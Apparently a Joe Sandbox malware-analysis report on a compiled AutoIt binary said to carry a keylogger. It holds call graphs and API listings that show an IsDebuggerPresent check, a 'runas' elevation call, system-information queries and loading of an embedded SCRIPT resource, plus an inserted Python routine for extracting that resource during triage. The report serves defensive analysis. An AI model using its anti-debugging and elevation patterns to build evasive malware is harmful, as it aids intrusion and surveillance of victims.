897667 59 API calls 102455->102457 102456->102412 102460 8fcd54 102457->102460 102462 899837 59 API calls 102458->102462 102461 898047 59 API calls 102459->102461 102463 897667 59 API calls 102460->102463 102464 8fcc47 102461->102464 102465 8fcc76 102462->102465 102466 8fcd5d 102463->102466 102467 897cab 59 API calls 102464->102467 102468 898047 59 API calls 102465->102468 102469 897667 59 API calls 102466->102469 102470 8fcc51 102467->102470 102471 8fcc82 102468->102471 102472 8fcd66 102469->102472 102473 899837 59 API calls 102470->102473 102622 8f4a31 GetFileAttributesW 102471->102622 102475 899837 59 API calls 102472->102475 102477 8fcc5d 102473->102477 102476 8fcd73 102475->102476 102479 89459b 59 API calls 102476->102479 102480 897b2e 59 API calls 102477->102480 102478 8fcc8b 102481 8fcc9e 102478->102481 102482 8979f2 59 API calls 102478->102482 102483 8fcd8e 102479->102483 102480->102458 102484 899837 59 API calls 102481->102484 102490 8fcca4 102481->102490 102482->102481 102485 8979f2 59 API calls 102483->102485 102486 8fcccb 102484->102486 102487 8fcd9d 102485->102487 102623 8f37ef 75 API calls Mailbox 102486->102623 102489 8fcdd1 102487->102489 102491 8979f2 59 API calls 102487->102491 102492 898047 59 API calls 102489->102492 102490->102456 102493 8fcdae 102491->102493 102494 8fcddf 102492->102494 102493->102489 102497 897bcc 59 API calls 102493->102497 102495 897b2e 59 API calls 102494->102495 102496 8fcded 102495->102496 102498 897b2e 59 API calls 102496->102498 102499 8fcdc3 102497->102499 102500 8fcdfb 102498->102500 102501 897bcc 59 API calls 102499->102501 102502 897b2e 59 API calls 102500->102502 102501->102489 102503 8fce09 102502->102503 102504 899837 59 API calls 102503->102504 102505 8fce15 102504->102505 102518 8f4071 102505->102518 102507 8fce26 102508 8f3c37 3 API calls 102507->102508 102509 8fce30 102508->102509 102510 899837 59 API calls 102509->102510 102513 8fce61 102509->102513 102511 8fce4e 102510->102511 102572 8f9155 102511->102572 
102514 894e4a 66 API calls 102513->102514 102514->102456 102515->102408 102516->102412 102517->102410 102519 8f408d 102518->102519 102520 8f4092 102519->102520 102521 8f40a0 102519->102521 102522 898047 59 API calls 102520->102522 102523 897667 59 API calls 102521->102523 102571 8f409b Mailbox 102522->102571 102524 8f40a8 102523->102524 102525 897667 59 API calls 102524->102525 102526 8f40b0 102525->102526 102527 897667 59 API calls 102526->102527 102528 8f40bb 102527->102528 102529 897667 59 API calls 102528->102529 102530 8f40c3 102529->102530 102531 897667 59 API calls 102530->102531 102532 8f40cb 102531->102532 102533 897667 59 API calls 102532->102533 102534 8f40d3 102533->102534 102535 897667 59 API calls 102534->102535 102536 8f40db 102535->102536 102537 897667 59 API calls 102536->102537 102538 8f40e3 102537->102538 102539 89459b 59 API calls 102538->102539 102540 8f40fa 102539->102540 102541 89459b 59 API calls 102540->102541 102542 8f4113 102541->102542 102543 8979f2 59 API calls 102542->102543 102544 8f411f 102543->102544 102545 8f4132 102544->102545 102546 897d2c 59 API calls 102544->102546 102547 8979f2 59 API calls 102545->102547 102546->102545 102548 8f413b 102547->102548 102549 8f414b 102548->102549 102550 897d2c 59 API calls 102548->102550 102551 898047 59 API calls 102549->102551 102550->102549 102552 8f4157 102551->102552 102553 897b2e 59 API calls 102552->102553 102554 8f4163 102553->102554 102624 8f4223 59 API calls 102554->102624 102556 8f4172 102625 8f4223 59 API calls 102556->102625 102558 8f4185 102559 8979f2 59 API calls 102558->102559 102560 8f418f 102559->102560 102561 8f41a6 102560->102561 102562 8f4194 102560->102562 102564 8979f2 59 API calls 102561->102564 102563 897cab 59 API calls 102562->102563 102565 8f41a1 102563->102565 102566 8f41af 102564->102566 102569 897b2e 59 API calls 102565->102569 102567 8f41cd 102566->102567 102568 897cab 59 API calls 102566->102568 102570 897b2e 59 API calls 102567->102570 102568->102565 
102569->102567 102570->102571 102571->102507 102573 8f9162 __ftell_nolock 102572->102573 102574 8b0db6 Mailbox 59 API calls 102573->102574 102575 8f91bf 102574->102575 102576 89522e 59 API calls 102575->102576 102577 8f91c9 102576->102577 102626 8f8f5f 102577->102626 102579 8f91d4 102629 894ee5 102579->102629 102581 8f91e7 _wcscmp 102582 8f920b 102581->102582 102583 8f92b8 102581->102583 102643 8f9734 80 API calls 2 library calls 102582->102643 102646 8f9734 80 API calls 2 library calls 102583->102646 102586 8f9210 102590 8f92c1 102586->102590 102644 8b40fb 58 API calls __wsplitpath_helper 102586->102644 102590->102513 102591 894f0b 74 API calls 102593 8f92ed 102591->102593 102592 8f9239 _wcscat _wcscpy 102645 8b40fb 58 API calls __wsplitpath_helper 102592->102645 102594 894f0b 74 API calls 102593->102594 102596 8f9308 102594->102596 102597 894f0b 74 API calls 102596->102597 102598 8f9318 102597->102598 102599 894f0b 74 API calls 102598->102599 102601 8f9333 102599->102601 102600 8f9284 _wcscat 102600->102590 102634 894f0b 102600->102634 102602 894f0b 74 API calls 102601->102602 102603 8f9343 102602->102603 102604 894f0b 74 API calls 102603->102604 102605 8f9353 102604->102605 102606 894f0b 74 API calls 102605->102606 102607 8f9363 102606->102607 102639 8f98e3 GetTempPathW GetTempFileNameW 102607->102639 102609 8f943a 102610 8b53a6 __fcloseall 65 API calls 102609->102610 102611 8f9445 102610->102611 102613 8f945f 102611->102613 102614 8f944b DeleteFileW 102611->102614 102612 894f0b 74 API calls 102619 8f936f 102612->102619 102615 8f9505 CopyFileW 102613->102615 102620 8f9469 _wcsncpy 102613->102620 102614->102590 102616 8f952d DeleteFileW 102615->102616 102617 8f951b DeleteFileW 102615->102617 102640 8f98a2 CreateFileW 102616->102640 102617->102590 102619->102590 102619->102609 102619->102612 102620->102616 102621 8f94f4 DeleteFileW 102620->102621 102621->102590 102622->102478 102623->102490 102624->102556 102625->102558 102647 8b520a GetSystemTimeAsFileTime 
102626->102647 102628 8f8f6e 102628->102579 102630 8cd9ab 102629->102630 102631 894ef4 102629->102631 102649 8b584d 102631->102649 102633 894f02 102633->102581 102635 8cd9cd 102634->102635 102636 894f1d 102634->102636 102666 8b55e2 102636->102666 102639->102619 102641 8f98de 102640->102641 102642 8f98c8 SetFileTime CloseHandle 102640->102642 102641->102590 102642->102641 102643->102586 102644->102592 102645->102600 102646->102600 102648 8b5238 __aulldiv 102647->102648 102648->102628 102650 8b5859 __setmode 102649->102650 102651 8b586b 102650->102651 102653 8b5891 102650->102653 102662 8b8b28 58 API calls __getptd_noexit 102651->102662 102655 8b6c11 __lock_file 59 API calls 102653->102655 102654 8b5870 102663 8b8db6 9 API calls __cftof_l 102654->102663 102657 8b5897 102655->102657 102664 8b57be 67 API calls 5 library calls 102657->102664 102659 8b58a6 102665 8b58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102659->102665 102661 8b587b __setmode 102661->102633 102662->102654 102663->102661 102664->102659 102665->102661 102669 8b55fd 102666->102669 102668 894f2e 102668->102591 102670 8b5609 __setmode 102669->102670 102671 8b5644 __setmode 102670->102671 102672 8b561f _memset 102670->102672 102673 8b564c 102670->102673 102671->102668 102696 8b8b28 58 API calls __getptd_noexit 102672->102696 102674 8b6c11 __lock_file 59 API calls 102673->102674 102676 8b5652 102674->102676 102682 8b541d 102676->102682 102678 8b5639 102697 8b8db6 9 API calls __cftof_l 102678->102697 102683 8b5453 102682->102683 102686 8b5438 _memset 102682->102686 102698 8b5686 LeaveCriticalSection LeaveCriticalSection _fprintf 102683->102698 102684 8b5443 102787 8b8b28 58 API calls __getptd_noexit 102684->102787 102686->102683 102686->102684 102687 8b5493 102686->102687 102687->102683 102690 8b55a4 _memset 102687->102690 102691 8b46e6 __filbuf 58 API calls 102687->102691 102699 8c0e5b 102687->102699 102767 8c0ba7 102687->102767 102789 8c0cc8 58 API calls 3 library calls 102687->102789 102790 
8b8b28 58 API calls __getptd_noexit 102690->102790 102691->102687 102695 8b5448 102788 8b8db6 9 API calls __cftof_l 102695->102788 102696->102678 102697->102671 102698->102671 102700 8c0e7c 102699->102700 102701 8c0e93 102699->102701 102800 8b8af4 58 API calls __getptd_noexit 102700->102800 102703 8c15cb 102701->102703 102708 8c0ecd 102701->102708 102816 8b8af4 58 API calls __getptd_noexit 102703->102816 102705 8c0e81 102801 8b8b28 58 API calls __getptd_noexit 102705->102801 102706 8c15d0 102817 8b8b28 58 API calls __getptd_noexit 102706->102817 102710 8c0ed5 102708->102710 102719 8c0eec 102708->102719 102802 8b8af4 58 API calls __getptd_noexit 102710->102802 102711 8c0ee1 102818 8b8db6 9 API calls __cftof_l 102711->102818 102713 8c0eda 102803 8b8b28 58 API calls __getptd_noexit 102713->102803 102715 8c0f01 102804 8b8af4 58 API calls __getptd_noexit 102715->102804 102718 8c0f1b 102718->102715 102724 8c0f26 102718->102724 102719->102715 102719->102718 102720 8c0f39 102719->102720 102748 8c0e88 102719->102748 102805 8b881d 58 API calls 2 library calls 102720->102805 102722 8c0f49 102725 8c0f6c 102722->102725 102726 8c0f51 102722->102726 102791 8c5c6b 102724->102791 102808 8c18c1 60 API calls 3 library calls 102725->102808 102806 8b8b28 58 API calls __getptd_noexit 102726->102806 102727 8c103a 102729 8c10b3 ReadFile 102727->102729 102734 8c1050 GetConsoleMode 102727->102734 102732 8c10d5 102729->102732 102733 8c1593 GetLastError 102729->102733 102731 8c0f56 102807 8b8af4 58 API calls __getptd_noexit 102731->102807 102732->102733 102740 8c10a5 102732->102740 102736 8c1093 102733->102736 102737 8c15a0 102733->102737 102738 8c1064 102734->102738 102739 8c10b0 102734->102739 102750 8c1099 102736->102750 102809 8b8b07 58 API calls 2 library calls 102736->102809 102814 8b8b28 58 API calls __getptd_noexit 102737->102814 102738->102739 102742 8c106a ReadConsoleW 102738->102742 102739->102729 102749 8c1377 102740->102749 102740->102750 102752 8c110a 102740->102752 
Control-flow Graph

[Figure: interactive control-flow graph for the AutoIt v3 runtime around the function at 0x893B3A, whose API calls are listed under APIs. The original page renders it as a node/edge diagram; the raw edge list (numeric node ids, addresses, API names and "N API calls" summaries) is not reproduced here. Nodes recoverable from it: GetCurrentDirectoryW (0x893B51); IsDebuggerPresent (0x893B7A) branching either to the normal path at 0x893B88 or to MessageBoxA (0x8CD272); GetFullPathNameW and SetCurrentDirectoryW; the AllocateAndInitializeSid/CheckTokenMembership/FreeSid check at 0x8E874B; GetForegroundWindow and ShellExecuteW (0x8CD320); window setup at 0x893A46 (GetSysColorBrush, LoadCursorW, LoadIconW, LoadImageW, RegisterClassExW) and 0x8939D5 (CreateWindowExW, ShowWindow); the window procedure at 0x893633 (DefWindowProcW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, Shell_NotifyIconW, PostQuitMessage); the message loop at 0x8A09D0 (PeekMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, Sleep, timeGetTime, WaitForSingleObject, GetExitCodeProcess, CloseHandle); resource loading at 0x894E89 (CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource); and the CRT start-up chain at 0x8B7C56. A separate cluster at 0x1500DC8/0x1501EA8 contains GetPEB and Sleep nodes.]

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00893B68
• IsDebuggerPresent.KERNEL32(?,?), ref: 00893B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,009552F8,009552E0,?,?), ref: 00893BEB
  • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
  • Part of subcall function 008A092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00893C14,009552F8,?,?,?), ref: 008A096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00893C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00947770,00000010), ref: 008CD281
• SetCurrentDirectoryW.KERNEL32(?,009552F8,?,?,?), ref: 008CD2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00944260,009552F8,?,?,?), ref: 008CD33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 008CD346
  • Part of subcall function 00893A46: GetSysColorBrush.USER32(0000000F), ref: 00893A50
  • Part of subcall function 00893A46: LoadCursorW.USER32(00000000,00007F00), ref: 00893A5F
  • Part of subcall function 00893A46: LoadIconW.USER32(00000063), ref: 00893A76
  • Part of subcall function 00893A46: LoadIconW.USER32(000000A4), ref: 00893A88
  • Part of subcall function 00893A46: LoadIconW.USER32(000000A2), ref: 00893A9A
  • Part of subcall function 00893A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00893AC0
  • Part of subcall function 00893A46: RegisterClassExW.USER32(?), ref: 00893B16
  • Part of subcall function 008939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00893A03
  • Part of subcall function 008939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00893A24
  • Part of subcall function 008939D5: ShowWindow.USER32(00000000), ref: 00893A38
  • Part of subcall function 008939D5: ShowWindow.USER32(00000000), ref: 00893A41
                                                                          • Part of subcall function 0089434A: _memset.LIBCMT ref: 00894370
                                                                          • Part of subcall function 0089434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00894415
                                                                        Strings
                                                                        • runas, xrefs: 008CD33A
                                                                        • This is a third-party compiled AutoIt script., xrefs: 008CD279
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                        • API String ID: 529118366-3287110873
                                                                        • Opcode ID: 2cbc23fa3b6cc186cd26f936e0ce807fa81ecf38be57f8693b105243520ca0c3
                                                                        • Instruction ID: d6df746f5a803f9db81cf90bbdf519951258e262e76bfd22934377894d636245
                                                                        • Opcode Fuzzy Hash: 2cbc23fa3b6cc186cd26f936e0ce807fa81ecf38be57f8693b105243520ca0c3
                                                                        • Instruction Fuzzy Hash: F651E430A1860CAADF11FBB9DC25EFD7B74FF45709F088069F422E61A2DA705645DB22

                                                                        Control-flow Graph

                                                                        control_flow_graph 904 8949a0-894a00 call 897667 GetVersionExW call 897bcc 909 894b0b-894b0d 904->909 910 894a06 904->910 911 8cd767-8cd773 909->911 912 894a09-894a0e 910->912 913 8cd774-8cd778 911->913 914 894b12-894b13 912->914 915 894a14 912->915 917 8cd77a 913->917 918 8cd77b-8cd787 913->918 916 894a15-894a4c call 897d2c call 897726 914->916 915->916 926 8cd864-8cd867 916->926 927 894a52-894a53 916->927 917->918 918->913 920 8cd789-8cd78e 918->920 920->912 922 8cd794-8cd79b 920->922 922->911 924 8cd79d 922->924 928 8cd7a2-8cd7a5 924->928 929 8cd869 926->929 930 8cd880-8cd884 926->930 927->928 931 894a59-894a64 927->931 932 8cd7ab-8cd7c9 928->932 933 894a93-894aaa GetCurrentProcess IsWow64Process 928->933 938 8cd86c 929->938 934 8cd86f-8cd878 930->934 935 8cd886-8cd88f 930->935 939 894a6a-894a6c 931->939 940 8cd7ea-8cd7f0 931->940 932->933 941 8cd7cf-8cd7d5 932->941 936 894aac 933->936 937 894aaf-894ac0 933->937 934->930 935->938 944 8cd891-8cd894 935->944 936->937 945 894b2b-894b35 GetSystemInfo 937->945 946 894ac2-894ad2 call 894b37 937->946 938->934 947 8cd805-8cd811 939->947 948 894a72-894a75 939->948 942 8cd7fa-8cd800 940->942 943 8cd7f2-8cd7f5 940->943 949 8cd7df-8cd7e5 941->949 950 8cd7d7-8cd7da 941->950 942->933 943->933 944->934 953 894af8-894b08 945->953 961 894b1f-894b29 GetSystemInfo 946->961 962 894ad4-894ae1 call 894b37 946->962 954 8cd81b-8cd821 947->954 955 8cd813-8cd816 947->955 951 894a7b-894a8a 948->951 952 8cd831-8cd834 948->952 949->933 950->933 957 894a90 951->957 958 8cd826-8cd82c 951->958 952->933 960 8cd83a-8cd84f 952->960 954->933 955->933 957->933 958->933 963 8cd859-8cd85f 960->963 964 8cd851-8cd854 960->964 965 894ae9-894aed 961->965 969 894b18-894b1d 962->969 970 894ae3-894ae7 GetNativeSystemInfo 962->970 963->933 964->933 965->953 968 894aef-894af2 FreeLibrary 965->968 968->953 969->970 970->965
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?,?,00000000), ref: 008949CD
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • GetCurrentProcess.KERNEL32(?,0091FAEC,00000000,00000000,?,?,00000000), ref: 00894A9A
                                                                        • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 00894AA1
                                                                        • GetNativeSystemInfo.KERNELBASE(00000000,?,00000000), ref: 00894AE7
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00894AF2
                                                                        • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00894B23
                                                                        • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00894B2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                        • String ID:
                                                                        • API String ID: 1986165174-0
                                                                        • Opcode ID: bb8e194895336528c4b583f7db9339ea12eaa61b77b9f62877aa082b4d6fb5ef
                                                                        • Instruction ID: 477a563e1b4262691fa7b2b3b6d5b18155aff4f0e022ea48d89acb339180344b
                                                                        • Opcode Fuzzy Hash: bb8e194895336528c4b583f7db9339ea12eaa61b77b9f62877aa082b4d6fb5ef
                                                                        • Instruction Fuzzy Hash: 5691A13198D7C4DACB21EB688550AAABFF5FF2A300B485DADD0CBD3A41D230E509D759

                                                                        Control-flow Graph

                                                                        control_flow_graph 1001 894e89-894ea1 CreateStreamOnHGlobal 1002 894ec1-894ec6 1001->1002 1003 894ea3-894eba FindResourceExW 1001->1003 1004 894ec0 1003->1004 1005 8cd933-8cd942 LoadResource 1003->1005 1004->1002 1005->1004 1006 8cd948-8cd956 SizeofResource 1005->1006 1006->1004 1007 8cd95c-8cd967 LockResource 1006->1007 1007->1004 1008 8cd96d-8cd975 1007->1008 1009 8cd979-8cd98b 1008->1009 1009->1004
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00894D8E,?,?,00000000), ref: 00894E99
                                                                        • FindResourceExW.KERNEL32(00000000,0000000A,SCRIPT,00000000,?,?,?,?,?,00894D8E,?,?,00000000), ref: 00894EB0
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00894D8E,?,?,00000000), ref: 008CD937
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00894D8E,?,?,00000000), ref: 008CD94C
                                                                        • LockResource.KERNEL32(00894D8E,?,?,?,?,?,00894D8E,?,?,00000000), ref: 008CD95F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                        • String ID: SCRIPT
                                                                        • API String ID: 3051347437-3967369404
                                                                        • Opcode ID: ea762c464c69ae4d6646d61de8dbd5423660aeecfadf140474e56302fe100abe
                                                                        • Instruction ID: 837e13ea929d875f1629a0628e4dfe428f8ad8b277b8266c19785222f03a8ca8
                                                                        • Opcode Fuzzy Hash: ea762c464c69ae4d6646d61de8dbd5423660aeecfadf140474e56302fe100abe
                                                                        • Instruction Fuzzy Hash: 7F11BC70300304ABDB209B65EC48F6B7BBAFBC4B21F148668F416C6250DB71EC01C620
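The listing above is the AutoIt stub locating its payload: FindResourceExW(NULL, 0x0A, "SCRIPT", 0) asks for an RT_RCDATA resource named SCRIPT, and LoadResource / SizeofResource / LockResource hand its bytes to the CreateStreamOnHGlobal stream created first. The Python below is an added triage example, not code from this report or from the AutoIt project: it walks a PE resource directory to pull that SCRIPT resource out of a binary without executing it, and checks for the runtime marker strings the earlier listings show (the MessageBoxA text "This is a third-party compiled AutoIt script." and the wide "AutoIt v3" / "AutoIt v3 GUI" strings). build_sample_pe() and SAMPLE_SCRIPT are constructed here so the example runs offline; on a real sample the returned blob is the compiled script, which still needs an AutoIt decompiler to recover source, and the marker hits identify the AutoIt runtime, not the keylogger it carries.

```python
import struct

RT_RCDATA = 10        # lpType 0x0A in the report's FindResourceExW call
SUBDIR = 0x80000000   # high bit set: entry points at a sub-directory (or a name string)
LOW31 = 0x7FFFFFFF

# Strings the report's listings show the stub passing to MessageBoxA / CreateWindowExW and
# using in its RegisterClassExW function: traits of the AutoIt runtime, not of the payload.
AUTOIT_MARKERS = {
    "third-party-msgbox": b"This is a third-party compiled AutoIt script.",  # ANSI (MessageBoxA)
    "autoit-v3-wide": "AutoIt v3".encode("utf-16-le"),                     # wide (CreateWindowExW)
    "autoit-gui-wide": "AutoIt v3 GUI".encode("utf-16-le"),
}

def _u16(b, o): return struct.unpack_from("<H", b, o)[0]
def _u32(b, o): return struct.unpack_from("<I", b, o)[0]

def parse_sections(pe):
    """Return (resource directory RVA, [(va, vsize, raw_ptr, raw_size), ...]) for a PE image."""
    nt = _u32(pe, 0x3C)
    if pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = nt + 4
    nsec, opt_size = _u16(pe, coff + 2), _u16(pe, coff + 16)
    opt = coff + 20
    dd = opt + (96 if _u16(pe, opt) == 0x10B else 112)   # data directories: PE32 vs PE32+
    rsrc_rva = _u32(pe, dd + 8 * 2)                        # IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
    sections = []
    for i in range(nsec):
        s = opt + opt_size + 40 * i
        sections.append((_u32(pe, s + 12), _u32(pe, s + 8), _u32(pe, s + 20), _u32(pe, s + 16)))
    return rsrc_rva, sections

def rva_to_offset(rva, sections):
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)

def find_resource(pe, res_type, res_name):
    """Bytes of the (type, name) resource, first language entry, or None. An int selects an ID,
    a str a name (compared case-insensitively, as FindResourceExW does)."""
    rsrc_rva, sections = parse_sections(pe)
    base = rva_to_offset(rsrc_rva, sections)

    def entries(dir_off):                      # IMAGE_RESOURCE_DIRECTORY + its 8-byte entries
        n = _u16(pe, dir_off + 12) + _u16(pe, dir_off + 14)
        for i in range(n):
            ident, child = struct.unpack_from("<II", pe, dir_off + 16 + 8 * i)
            if ident & SUBDIR:                 # named entry -> IMAGE_RESOURCE_DIR_STRING_U
                so = base + (ident & LOW31)
                ident = pe[so + 2:so + 2 + 2 * _u16(pe, so)].decode("utf-16-le")
            yield ident, child

    def same(ident, wanted):
        if isinstance(wanted, str):
            return isinstance(ident, str) and ident.upper() == wanted.upper()
        return ident == wanted

    for t, tdir in entries(base):                                 # level 1: type
        if not same(t, res_type) or not tdir & SUBDIR:
            continue
        for n, ndir in entries(base + (tdir & LOW31)):            # level 2: name
            if not same(n, res_name) or not ndir & SUBDIR:
                continue
            for _lang, leaf in entries(base + (ndir & LOW31)):    # level 3: language
                if leaf & SUBDIR:
                    continue
                rva, size = struct.unpack_from("<II", pe, base + leaf)  # IMAGE_RESOURCE_DATA_ENTRY
                off = rva_to_offset(rva, sections)
                return bytes(pe[off:off + size])
    return None

def autoit_markers(pe):
    """Labels of the AutoIt runtime strings present in the image (empty list: none found)."""
    return [label for label, needle in AUTOIT_MARKERS.items() if needle in pe]

def build_sample_pe(script):
    """Constructed stand-in for a compiled AutoIt binary: a minimal PE32 whose only section, .rsrc
    at RVA 0x1000, holds one RT_RCDATA resource named SCRIPT. Not a real AutoIt image."""
    def directory(named, ids):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)
    name_off, data_entry_off, data_off = 0x58, 0x48, 0x68
    rsrc = bytearray()
    rsrc += directory(0, 1) + struct.pack("<II", RT_RCDATA, SUBDIR | 0x18)         # type level
    rsrc += directory(1, 0) + struct.pack("<II", SUBDIR | name_off, SUBDIR | 0x30)  # name level
    rsrc += directory(0, 1) + struct.pack("<II", 0, data_entry_off)                 # language level
    rsrc += struct.pack("<IIII", 0x1000 + data_off, len(script), 0, 0)             # data entry
    rsrc += struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le")
    rsrc += b"\0" * (data_off - len(rsrc)) + script
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                   # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<II", opt, 96 + 8 * 2, 0x1000, len(rsrc))         # resource data directory
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), 0x1000, len(rsrc), 0x200, 0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\0\0" + coff + bytes(opt) + sec
    return bytes(hdr + b"\0" * (0x200 - len(hdr)) + rsrc)

SAMPLE_SCRIPT = b"CONSTRUCTED-PLACEHOLDER-FOR-THE-COMPILED-SCRIPT"   # not real AutoIt bytecode
```

To use it on a sample, read the file into bytes and call find_resource(data, RT_RCDATA, "SCRIPT") followed by autoit_markers(data); write the returned blob to disk for the decompiler. The walker mirrors the three-level layout the runtime itself traverses through FindResourceExW (type, then name, then language), so a sample that stores its script under a different resource name or type returns None here just as the stub's own lookup would fail.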
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,008CE398), ref: 008F446A
                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 008F447B
                                                                        • FindClose.KERNEL32(00000000), ref: 008F448B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: 0f82b7380a0f79120e91feaef572c12295f41932dca6a38e91e7de6de707abbe
                                                                        • Instruction ID: 93db06207ee002cae5206db06fdbd472be990accfc25c27e06e4fb11f45f005a
                                                                        • Opcode Fuzzy Hash: 0f82b7380a0f79120e91feaef572c12295f41932dca6a38e91e7de6de707abbe
                                                                        • Instruction Fuzzy Hash: 1DE0D83352590C6752106B38EC0D4FA775CEE15335F204B16F935E10D0E7745900E599
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008A0A5B
                                                                        • timeGetTime.WINMM ref: 008A0D16
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008A0E53
                                                                        • Sleep.KERNEL32(0000000A), ref: 008A0E61
                                                                        • LockWindowUpdate.USER32(00000000,0095546C), ref: 008A0EFA
                                                                        • DestroyWindow.USER32 ref: 008A0F06
